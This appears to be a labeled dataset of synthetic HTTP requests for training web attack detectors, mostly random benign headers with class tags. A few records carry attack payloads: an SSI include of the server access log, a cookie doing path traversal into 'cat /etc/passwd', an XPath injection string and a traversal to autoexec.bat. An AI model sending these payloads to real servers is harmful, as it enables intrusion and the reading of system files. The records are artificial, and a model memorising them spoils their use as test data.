Expect: Dr6eo3i=fiiom3eN;iawnsS=qo8an
From: lnoa@mkfNdbdI2t.de
If-Modified-Since: Wed, 29 Aug 07 14:21:34 UTC
If-Unmodified-Since: Thu, 02 Oct 08 13:50:10 GMT
If-Match: "1rPoyyaqj4Qvouc"
If-None-Match: *
If-Range: Wed, 29 Dec 04 11:21:12 GMT
Max-Forwards: 1
MIME-Version: 4.1
Pragma: tt=hwl
Proxy-Authorization: butNst znws=oeietn
Authorization: sase zafze=Dz3aor
Range: -89,09289-622,74434-579715
Referer: /io0atz/ceea5qx/yise7yie/rnbmnd/wrahje.php3
TE: trailers
Trailer: Referer
User-Agent: bnXowNhP6 http://www.mle3o.ch
UA-CPU: PowerPC
UA-Disp: 857,147,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 802x162
Via: 0.3 185.55.10.10
Transfer-Encoding: gzip
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 1838751121363
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27467
Start - Id: 24942
class: Valid
GET /tOkrB2z/hh/nmpJNUc2I5-l9Zce.mspx?n6sotceboolay=rtmi&nnnottwd4insepN=end&an8h3fey=905110&MHv.perl7bjGQyV=75&Lt1lsJscriptdelete3rGR=432523&Pahtpass0autoexecoFEl0a=860110&rnet=kia&pIeSus5e=nhracvcui&.S50pml5X=91&lteIohsl=hGBBsIX&soUno6erLodida=hig%40bniAlTa&mo=0644308069&eddsgfiaE=+r8bwgettn&lv=rJTn HTTP/1.1
Host: 2.159.77.23
Connection: close
Accept: video/mpeg;q=0.3, application/x-tar, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iu2eta-Rohsyt7o
Cache-Control: max-stale=4
Client-ip: 172.135.105.135
Cookie: Vtoui2ls=dmfe~da;ekccxtpso=l1ad)
Cookie2: $Version="578"
Date: Tue, 23 Oct 07 12:51:58 GMT
ETag: W/"h2Xmy5GCd4Wj_v4L6-3"
Expect: de4t
From: iefmllR@anati.de
If-Modified-Since: Mon, 21 Apr 08 21:52:18 CET
If-Unmodified-Since: Mon, 23 Jul 07 22:10:22 CET
If-Match: "Rrqz9cXrZEZyV63N1"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 4.2
Pragma: ecay5Rwa=wtihuacw
Proxy-Authorization: NTLM ZXp1c2NlbjFlYWhhaWhwTml4OXRtb2VvQ2VoamhKdDZEZWhGY21MbnRlbUNl
Authorization: 8nesao aeuTkre=eRHdrH
Range: -47448,86125-296,-084
Referer: /lsros.png
TE: trailers,deflate,deflate
Trailer: If-Range
User-Agent: thee (bGAVdYGt5; rPKgKBkqz)
UA-CPU: Sparc
UA-Disp: 899,4850,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 778x801
Via: coaszs/6.5 29.242.20.72, 7.2 53.84.170.216, 8.7 www.gi9eqb.png
Transfer-Encoding: slwusg; DoDt=mslzovfu
Upgrade: ttaild/2.4, veere/8.1, dntrep/1.5, eseTr/3.4, ieS/1.5
Warning: 423 89.183.100.167:0470 "eepcy4ogcNtmpn1e36sn" 
X-Forwarded-For: 38.96.136.60
X-Serial-Number: 2466804840974150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24942
Start - Id: 28195
class: Valid
GET /a3.cQnre87h/Tmtsrnalynetye/oaxg1LSdOCPeKot/sNGX/217ZRU/3kSK78/s./tnaqiorecteooh/_SRheZUplogGr.css? HTTP/1.0
Host: 57.41.136.87:80
Connection: close
Accept: image/*, video/quicktime;q=0.8, video/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 208.143.114.201
Cookie: p0pd=o7ie5hsua
Cookie2: $Version="08"
Date: Mon, 21 Feb 05 19:23:47 CET
ETag: "HAKS-GZxAfZFJzHFo@3"
Expect: 100-continue
From: haidri@m6zcet8gA.ch
If-Modified-Since: Wed, 02 Apr 08 08:06:32 UTC
If-Unmodified-Since: Wed, 15 Sep 04 04:03:19 CET
If-Match: *
If-None-Match: "ZmxW-M0M5dHBfH5HT"
If-Range: "FO2bi@mhpNrvBJbR"
Max-Forwards: 887
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest qop=Rnunev
Authorization: eto8 uEecs=rhne5mt
Range: -569,-376,5-
Referer: http://zrgawfie.gov/omeTwp/upaRO/sdoeD.avi
TE: deflate,deflate
Trailer: Max-Forwards
User-Agent: Mozilla/6.8 (Windows; U; Windows NT 0.2; ur-9a; rv:3.8.7) Gecko/61302437
UA-CPU: x86
UA-Disp: 0207,3028,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8070x456
Via: HTTP/8.3 58.34.1.36:72, 5.4 www.heleh.htm, 3.1 67.72.12.121:3801
Transfer-Encoding: gzip
Upgrade: trp/1.7, uirtns/0.1, ein/9.5, nhk0a/7.9
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 3105222216298089545
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28195
Start - Id: 8098
class: Valid
GET /PJkRClQrrmZ6/iossgt81/i6u/hi/meol69roecqf/t___Z6uY98m8-Kiwkl@/b.oyK3Mzq-1S0Buc--qI/Hp7VGacceptxO.1JDc.jpg?l_U4=26&abzNTW5p6=easr+oiiI%29e&ncjxateuTu=5l0hnmntdte&yde6muiaa=stdintt&ceeii=input HTTP/1.0
Host: www.talhce.com:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.4, identity, gzip
Accept-Language: O9iH-wi3iicN, A0-eioins;q=0.2
Cache-Control: no-cache
Client-ip: 16.152.221.65
Cookie: ta=av9RdGUy;xs9=tzqOFwX
Cookie2: $Version="9"
Date: Fri, 19 Feb 10 19:55:27 GMT
ETag: W/"GEogZHcdzjw_SeFzc7Ha"
Expect: 100-continue
If-Modified-Since: Tue, 07 Nov 06 16:50:22 UTC
If-Unmodified-Since: Tue, 01 Apr 08 15:34:38 UTC
If-Match: "iDFk95UOJVhe6.pU3"
If-None-Match: *
If-Range: Mon, 03 Aug 09 03:07:54 GMT
Max-Forwards: 6790
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic ZWNkSWllOndzam1xZQ==
Authorization: Basic dTNlaWhsOmxJb3luZWE=
Range: 96926-503180,-72
Referer: /e3olt/iheu/meirru.cgi
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 7.6; hd-7h; rv:9.5.7) Gecko/99099996
UA-CPU: 68000
UA-Disp: 4009,1990,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 308x6685
Via: 1.4 www.aooaecrt.htm
Transfer-Encoding: eynU
Upgrade: ct84i/3.2, vnwu2/3.1, thbz/5.5
Warning: 302 121.74.121.140 "mk77oa" 
X-Forwarded-For: 20.60.245.141
X-Serial-Number: 74656
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8098
Start - Id: 35929
class: PathTransversal
POST /chYtWGw7Jyeaj/tb8Dhg@nCafhe/oUUj-sNy0V16ONrcj/9oEarrsegf9aWu/zFE8/o3p5ei/n@QESNbEWPErWaeA/lx7F/taiShsN9oeoercEno/sa83tvtmfnqern/y1hslt8zeanzo.sh? HTTP/1.1
Content-Length: 267
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Host: www.bznamsss.biz
Connection: fhrlctct
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, deflate
Accept-Language: roueempz-lurdulDO;q=0.6
Client-ip: 17.76.7.195
Date: Wed, 06 Aug 08 20:43:22 UTC
If-Modified-Since: Sun, 16 Apr 06 22:54:57 UTC
If-Unmodified-Since: Thu, 03 Apr 08 21:27:39 CET
Max-Forwards: 400
Pragma: no-cache
Referer: /qzreertl/gdmid/ndgr/Taooa7.wav
User-Agent: lhtzhhnhtnua

ptz0ae1Rrgbh=874112&ahxvl=s-hb_Mwh@4&Z@Hc0Mr= ftpn&&mun8enedknrtm=iha6gmenswalllikel&rCdh=re&daynsot0aper=00179&o1nlXhev=<!--  #include virtual="/var/log/httpd/access.log"  -->&saner3ahAflci0=copykbu;hyl &osulno=car&aeantRhatzgua=367495608

End - Id: 35929
Start - Id: 10465
class: Valid
GET /bsns/wOu6bhk28KdqbCE5/rJ4G-yz/o3GJCz/iH@p3H9TF4kqS40xHfx./os2oohtg/fvJI_/ewsdt8tknifArhw5bR.htm?atdiH=%3Fr&vtRzij9iri=ii3hcle&eg8Nakd67Sht=06112&nan5nbiasS=dgiu&ewr=ipO-YbQ%40Z&igqrdresdD=i%2Bag+iiozdnytehon%3D%3Dr HTTP/1.0
Host: 180.9.247.136
Connection: lixlaeen
Accept: image/gif;q=0.4, audio/*;q=0.5, audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, identity, deflate, deflate
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 140.221.90.112
Cookie: migihiaopegeaeb=556
Cookie2: $Version="4"
Date: Mon, 23 Oct 06 05:16:12 UTC
ETag: "o4hTUNKQt9lVw62b4Tjs"
Expect: 100-continue
From: adwhievh@07neTe5sO.uk
If-Modified-Since: Sun, 04 Sep 05 23:10:52 GMT
If-Unmodified-Since: Sun, 17 Jun 07 07:55:10 UTC
If-Match: *
If-None-Match: "nP0vZX2UtAXBX69P0c"
If-Range: Wed, 04 Jan 06 06:41:26 GMT
Max-Forwards: 8182
MIME-Version: 2.6
Pragma: eC=l
Proxy-Authorization: NTLM c0lwRGFJb2x0bTNkdGVlRXJleTFwc2Zoc2VzbXZuN3IyeHRubA==
Authorization: Digest nc=8a62Ae4F
Range: 5-1,96994-671,51284-
Referer: http://www.Ie1o.fr/ulOpleha/Osdtot/iiehpgai.png
TE: trailers,trailers,chunked;q=0.2
Trailer: Via
User-Agent: nmxdndcTXnvhlDnyhs
UA-CPU: StrongARM
UA-Disp: 4910,021,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 747x1672
Via: harrat/3.4 243.136.85.64
Transfer-Encoding: deflate
Upgrade: ctah/6.6, Rtzei/0.4, fl4/6.0, eofhle/5.9, 7euoNe/5.2
Warning: 079 207.58.135.243:6637 "lldeeiya7z2nb" "Sat, 20 Mar 04 17:46:02 CET"
X-Forwarded-For: 153.53.63.108
X-Serial-Number: 23963701086419023023
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10465
Start - Id: 12282
class: Valid
GET /egs4/4Fadiv3.3homevrmk/rGSj4If93NqOf/-system/2rDbwlqnilf/kjKviB2/niwLdtSoNMu2z.XANRAV/b-_cQgDA.Y/ab8dt9sokq2eoi/oneo4enan/id2Ng/ti.bin? HTTP/1.0
Host: 204.242.93.98
Connection: rseaer
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 69.220.154.61
Cookie: jrsQhtGeelc5hd=rye>dt;snHye=6870884;gnhevarjyltOse7=91305033;nXej=twninclude;JFv9T=46806402
Cookie2: $Version="624"
Date: Tue, 18 Jan 05 04:38:29 GMT
ETag: "ET@n_AqlUV.56CF"
Expect: 100-continue
From: pwgrma@e4nqarn.be
If-Modified-Since: Mon, 04 Sep 06 21:11:00 GMT
If-Unmodified-Since: Wed, 14 Oct 09 04:07:44 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Apr 05 16:18:36 GMT
Max-Forwards: 05
MIME-Version: 5.0
Pragma: t4lnohax='vroT'
Proxy-Authorization: Basic dG1yeWxhajY6YjVsMnVhdG8=
Authorization: Digest nc=CfB9B9aD
Range: 9688-4015,-4,45-
Referer: http://www.al73hya.biz/io6Ihbi/clettrR.tiff
TE: deflate
Trailer: Host
User-Agent: 7fcIgtndt2/4.2.6.2
UA-CPU: x86
UA-Disp: 689,5553,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 981x039
Via: lm5/0.1 www.ha4siezn.jpeg:6046, 7.3 www.960sdN.tiff:6
Transfer-Encoding: gzip
Upgrade: yohoh/1.0, aet/2.6, xthnat/0.6
Warning: 512 www.eonIat.png "pOnii" 
X-Forwarded-For: 108.211.80.19
X-Serial-Number: 787463
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12282
Start - Id: 5235
class: Valid
POST /nxUcYP24us@/2_aD3fnodeVB/XG.nctw9kV9b/bgsoundYduHoptwlJdoevH_/sae.asmx? HTTP/1.1
Content-Length: 167
Content-Language: iyyc
Content-Encoding: identity
Content-Location: http://www.hOhm.uk/zmelff/egMddkt.cfm
Content-MD5: MnN6dGE5VWMydGlOc1RjYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jul 09 21:31:16 GMT
Last-Modified: Mon, 01 May 06 17:16:17 GMT
Host: 99.7.114.62
Connection: keep-alive
Accept: audio/x-wav;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.0
Accept-Language: li2-ieefkCrt;q=0.3, qtto-0wr, Ogau17-e
Cache-Control: no-transform
Client-ip: 69.94.156.212
Cookie: 8ehxarUnaqdFrE=<iji;aAmonw8tfKetPN=52501037;dtcqodhoa0tpoor=7
Cookie2: $Version="1"
Date: Tue, 18 Jan 05 02:34:30 UTC
ETag: W/"3Uy.-10KEWc6zZY"
Expect: ARmzle=c5eney
From: nuccwnm@7ndfhebs.fr
If-Modified-Since: Mon, 19 Jul 04 16:39:38 CET
If-Unmodified-Since: Thu, 06 Aug 09 16:57:35 CET
If-Match: "e19lE1y.fecUVpUVBtHp"
If-None-Match: "4mFwcGzbQUagSgHHax"
If-Range: *
Max-Forwards: 1028
MIME-Version: 9.1
Pragma: mtzc='AmN9bt'
Proxy-Authorization: hhad rueehhom=useiI
Authorization: Digest cnonce="a6nr"
Range: 627-96060,029458-
Referer: /0em3/ulhiaaWn.html
TE: trailers,chunked;q=0.4,trailers
Trailer: Expect
User-Agent: e5htc8daIr/9.9.2
UA-CPU: StrongARM
UA-Disp: 316,8199,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4414x768
Via: 4.6 107.224.146.186, FTP/5.6 251.245.115.136, FTP/9.8 201.63.36.136:5721
Transfer-Encoding: gzip
Upgrade: dnid/6.6, cGoH/6.5, no1o/5.3, ni9ihh/8.4
Warning: 646 www.eBtlm.js "taDea3t" 
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 22844
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

WS_.kZ-u=812671&inTz2wk=lXFR&eE47ar1Noirrd=5bm&orciwafexnsa3=n&alyso=2462669&d5lO3Nt=45&udrOrrr=as7D00&processing-instructionszY-hNJ=2usuhe&tq=Lt&yten2tath=\ g6ct dI

End - Id: 5235
Start - Id: 6080
class: Valid
PUT /ww4zaB/e_XZX/5rscLr0E.js? HTTP/1.0
Content-Length: 103
Content-Language: vq,ru
Content-Encoding: deflate
Content-Location: /bht5/ahd2l/tlnduo/yEvlh.php3
Content-MD5: MXVpNGhlcjNyaHMwcnRFeg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Nov 04 10:34:01 UTC
Last-Modified: Tue, 01 Mar 05 04:49:16 UTC
Host: 168.92.5.46
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, identity;q=0.6, compress;q=0.7
Accept-Language: 5m3srph-r, teofiu-o3e, Het-Ei1da, lnf-B, 7-c
Cache-Control: only-if-cached
Client-ip: 246.183.111.215
Cookie: BdklocationLjmh=6;bimsa=mendAeepusttz?;voarsan=nwttmpyromochael3scriptec1n;9N1IQ=nwoihnrl;oSe3=78067030
Cookie2: $Version="3"
Date: Thu, 20 Oct 05 02:04:40 CET
ETag: W/"NE3aUauoXGYsn5j1u"
Expect: hoe5r
From: etncdt0y@seyoalsi.be
If-Modified-Since: Fri, 29 Jun 07 06:30:11 CET
If-Unmodified-Since: Tue, 21 Feb 06 15:35:02 UTC
If-Match: *
If-None-Match: "CHE1ePhoFn-FVGIs"
If-Range: Thu, 02 Mar 06 17:22:15 CET
Max-Forwards: 3169
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/kgj1ehet/pnldts/rwlseod/iTpt6ia/uotey0if.php
Authorization: Digest username="aoair"
Range: 8100-26
Referer: http://www.eof5.cz/anld7ot.jpeg
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.4 (Machintosh; U; Mac OS X 6.0; ne-Tm; rv:5.3.3) Gecko/50398019
UA-CPU: x86
UA-Disp: 381,9388,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 179x0676
Via: 1.7 61.221.168.167
Transfer-Encoding: deflate
Upgrade: asOo/3.7, xilcsc/2.8, h8r/6.5, llsa/6.6
Warning: 567 www.e4sUlero.js "nEipei14" "Sat, 24 May 08 13:26:16 GMT"
X-Forwarded-For: 65.50.7.154
X-Serial-Number: 172658995199339
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BiehuoocArpEe=8554530&Xspbimaildq=ypasswd&uattru8en=uaedidz&7inOPP=9&hStumhmbsMre=eOf&aeat=1o2wt6nedaxk

End - Id: 6080
Start - Id: 8206
class: Valid
GET /Kuo3bPHMABlNUG/htacces0N9.IS7w4H/nmdoe/3f.js? HTTP/1.0
Host: 43.170.93.40
Connection: swnhrs
Accept: */*;q=0.3
Accept-Charset: x-mac-ce;q=0.3, x-mac-icelandic, windows-1251;q=0.2, x-mac-chinesetrad, iso-8859-5;q=0.4
Accept-Encoding: *
Accept-Language: RNncrtl-fr, h-bs8hrfw;q=0.4, z-7, fcU-ao;q=0.4, bto0-tn8nq
Cache-Control: no-cache
Client-ip: 151.189.48.156
Cookie: mtsemtqaxnseLem=$ (e;irc=3hci;FaUM-=4491645;hrnailme9=O ;re8uor5=rgYbRTHtFR
Cookie2: $Version="6"
Date: Sun, 06 Mar 05 18:44:53 GMT
ETag: W/"rCJcrUtlAG6_Lntrf28"
Expect: 100-continue
From: tnjiee0n@rlf3ge.de
If-Modified-Since: Wed, 24 Mar 10 24:55:54 UTC
If-Unmodified-Since: Tue, 01 Sep 09 20:05:37 UTC
If-Match: "z47GMOtel2GJoZQKi"
If-None-Match: "NpsUqvEjnAQPAV3r3"
If-Range: Thu, 31 Dec 09 21:29:41 CET
Max-Forwards: 4
MIME-Version: 1.5
Pragma: Y=istrEfdo
Proxy-Authorization: Digest cnonce="rtmdnshp"
Authorization: Basic bWR1Y0lBTzpTc3Q2ZXJ3bw==
Range: 972-39
Referer: /irNuna/onao/lrrLm.jpeg
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: odmleagoRichri
UA-CPU: x86
UA-Disp: 260,910,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1852x378
Via: HTTP/5.0 145.244.241.252:25, FTP/0.1 www.vlkr.js:4
Transfer-Encoding: i8an
Upgrade: 9o6e/7.7, eaTRi/7.4, yaoEli/5.7, rnj/7.6, pad/2.0
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 112.242.143.173
X-Serial-Number: 8468350
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8206
Start - Id: 28652
class: Valid
GET /l0rwomutjb/netyNictl/HQH/tndleePeddekneesaUle/iasaehurwL0oiUEsha/1aoariejbetntbwc/oTlzdz54_-4HdqGJqo/eooT8iyIv/sldlpolabkVrl1d/WfsVB/eetvmstT7mea5iRp.png?hrmiitsDsDtQa=6r8nPUKu__&enaaaeozastehar=vt+&ade=3629&QdeleteR92d=ddsxNsO91e&fme=v%3BtsadlyhDt&itrbEtzqxebrn=qt8zaaiemaa&1omeja=%27aelghz+eulaieo&@Q3HZ9varKI=noodgnd&ti9od=323&hEtdoiny1derzSe=yEEReeccnUyfseeNed&IincludeD4likehtpassselect3=%25a%3Dn%3CdoHinputh&k2nullOt0J=tc5ee HTTP/1.1
Host: 94.127.88.6
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: l-e;q=0.3, h-anyo7;q=0.2
Cache-Control: max-stale=5081
Client-ip: 75.91.92.204
Cookie: S2dlash4oieel=unionty4hrt
Cookie2: $Version="2"
Date: Wed, 28 Jul 04 02:16:26 GMT
ETag: "sobdAmaiQcdIoFx9@ju"
Expect: eugrer
From: tosers@epppo9rd.biz
If-Modified-Since: Sat, 21 Feb 04 10:31:34 CET
If-Unmodified-Since: Fri, 23 Jan 04 03:09:54 GMT
If-Match: *
If-None-Match: "qRDnCJ.UPgxLt0jr"
If-Range: *
Max-Forwards: 248
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: Basic bmNjdGpzcnk6cjlicWxh
Range: 1908-
Referer: /etdi9.pdf
TE: trailers
Trailer: Date
User-Agent: weah/3.2.0.3
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9872x6402
Via: 2.9 www.jqnieoa.tiff, 9.5 www.Ed3l1erx.htm, HTTP/4.4 78.236.85.238
Transfer-Encoding: compress
Upgrade: tsSmni/9.1
Warning: 019 www.dfic.css "r93obanaT" 
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6125410467694
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28652
Start - Id: 36681
class: OsCommanding
GET /TY/5vduO0OxZR1yfC7xTR5/eeR4h.Fqu3UL67J2zi/PSJVAg2Z5yv/PHxZ/Pisam5T.c3Pqnrchild/2mailZoEIDmuuGHQ/ayQNnOGzgy1x/aAZF0Eo/ewI/6YXUcTD1eDKE.php? HTTP/1.1
Host: 248.149.19.243:80
Connection: e7wtxp
Accept: text/html
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, deflate;q=0.9, deflate;q=0.7
Accept-Language: icroh5t-xsef;q=0.7, n-objid;q=0.5, Rhi0nhcr-e, 6t-le;q=0.1, eyadrne-hrds8lR6;q=0.2
Cache-Control: no-cache
Cookie: anUYC=/../../../../../../../bin/cat   /etc/passwd    |;oe6nea=35
Cookie2: $Version="82"
Date: Sun, 04 Feb 07 07:34:30 GMT
ETag: "wy@OzR52T2wQnQtS"
Expect: eo7ptt=i1erHed;eEedOtn
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
Authorization: Basic TmFvMWQxczpvdHRvZWFLRQ==
Range: 54-9,-814311,72-
Referer: http://si4o.de/wsfzT.php4
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 1.1; sg-ce; rv:2.6.2) Gecko/09916906
Transfer-Encoding: utmate; sdee6=DtnlyOam
Warning: 690 185.253.94.244 "Garhr" "Tue, 09 Jan 07 24:46:57 UTC"
X-Forwarded-For: 4.27.255.43
----: -------------------------------------------------

null

End - Id: 36681
Start - Id: 49724
class: XPathInjection
GET /tjobEtcafcM88i/hT.FN/aeoiejiRlle/hcaeaaixMlselro8om/rF/iacNesecdpuetrian/bg71BovFn1BSrLL/6nsuya1rhzlmadgh/blyaeaeia2ojrik.jpeg?tde4=e%26etkostconnectee4Ne%24mail-aeo&rttt6hcsa=oBnqnk1tvAWY&nmthU2esss=cn6qErpw%27+++or+++++N%2Fgluamr%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D652%5D++or+++%27oobnn%27+++%3D++%27&bthaLs=tprsxni HTTP/1.1
Host: 235.123.164.15
Connection: iyk209
Accept: */*;q=0.4
Accept-Charset: iso-8859-5;q=0.2, big5, euc-kr;q=0.5, windows-1258;q=0.5, iso-8859-15;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 173.103.247.250
Cookie: gahEzdoooegq=s0dYvreorI;rUClsC=o0;2sluh3eeoEo=08822
Cookie2: $Version="6"
Date: Fri, 19 Dec 08 10:47:41 CET
ETag: "iITkPXqitf-bCHofqIg"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Fri, 07 Dec 07 19:25:54 UTC
If-Unmodified-Since: Tue, 08 Dec 09 02:01:09 CET
If-Match: "9w1jVsfeOf0efabXwyI"
If-None-Match: *
If-Range: Sun, 14 May 06 10:21:04 GMT
Max-Forwards: 2678
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: NTLM bHdycmRnbWVyYXJzZXR0a28zOU0ybW1yZmVoZ3dlZXRw
Range: -5,-8543,85-24971
Referer: http://sosaLs.net/rhenI0m/ssdlf2/e32w.php
TE: trailers
Trailer: Via
User-Agent: Mozilla/5.1 (Machintosh; U; Mac OS X 0.2; eh-ae; rv:0.4.1) Gecko/29743119
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 9.9 www.teez.gif, 6.7 www.wlycsnOx.js, 4.7 www.leys.png
Transfer-Encoding: compress
Upgrade: 2sv/4.0, uetOn/7.3
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49724
Start - Id: 15788
class: Valid
GET /sG/aZc7wVTfE/ha8zP3ysayZs.nsf?naktldm0penyth=r-Eo HTTP/1.0
Host: www.myy4wmtdt.net
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: ilapn5-qeei;q=0.4, ryugmv-mi;q=0.3, huro0R-wt4iMi, 8h-ilnwA
Cache-Control: max-stale
Client-ip: 229.112.76.63
Cookie: twiadytlti8irGe=eeNoew7;6x@-JGpEP=2tb7P.pMa_E;-gP2Gu49=1947;nuecOu=varjgogxba Erno?&';Lir2=1450
Cookie2: $Version="392"
Date: Mon, 19 Apr 04 06:51:31 CET
ETag: W/".hNv3sH_12G-3fN2sv"
Expect: JlWloa=anytyghE;nwElpr=eulete
From: adennt@OfhxoattHn.com
If-Modified-Since: Sun, 11 Jan 04 04:50:34 UTC
If-Unmodified-Since: Tue, 21 Apr 09 14:05:05 UTC
If-Match: "_Qh_z54emCVU92_Ly"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM ZW9sZWFvcW9ubmdudG5OeGFsM2VzckVhaTNnYW01eG8=
Authorization: Basic YXRlZXQ6bGxpc3Y1
Range: 56833-
Referer: /eozi.dll
TE: chunked;q=0.6,chunked;q=0.1,gzip;q=0.3
Trailer: Proxy-Authorization
User-Agent: iTuQlLHWI http://www.tecoejte.st
UA-CPU: StrongARM
UA-Disp: 395,253,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9100x614
Via: 5.5 www.dasd.js
Transfer-Encoding: gzip
Upgrade: mUern/7.9
Warning: 404 124.90.161.164:454 "uesttf9iRtd" 
X-Forwarded-For: 214.18.61.238
X-Serial-Number: 698228
----: -------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 15788
Start - Id: 36111
class: PathTransversal
GET /B5q5qJ/aaan/qxUvoL5dUvw4.swf?IchTs3akk=%5Cautoexec.bat HTTP/1.0
Host: www.eaEoo0lsri.de
Connection: close
Accept: application/x-tar;q=0.5, application/zip
Accept-Charset: iso-8859-8;q=0.2, x-mac-korean;q=0.4, windows-1251, windows-1252
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 100.85.62.104
Cookie: iodr4=aD363rFsXiq;7DPB5=193167453;7a5EohtdH=baatHetilikr<
Cookie2: $Version="163"
Date: Fri, 11 Aug 06 06:07:58 UTC
ETag: W/"lwclySd@piARZiDF"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Thu, 27 Mar 08 18:49:54 CET
If-Unmodified-Since: Fri, 22 Oct 04 18:45:40 CET
If-Match: "26ClTSCKNmXT78gq"
If-None-Match: *
If-Range: Fri, 10 Jun 05 24:15:09 GMT
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: 9844-66,0-,-297
Referer: /glabhnee/8nGInnoy/2luBdnhe/eenw.exe
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: iabirvhmq/7.0.7
UA-CPU: StrongARM
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 001x200
Via: HTTP/0.2 69.137.81.216
Transfer-Encoding: compress
Upgrade: iormhs/9.8
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36111
Start - Id: 23023
class: Valid
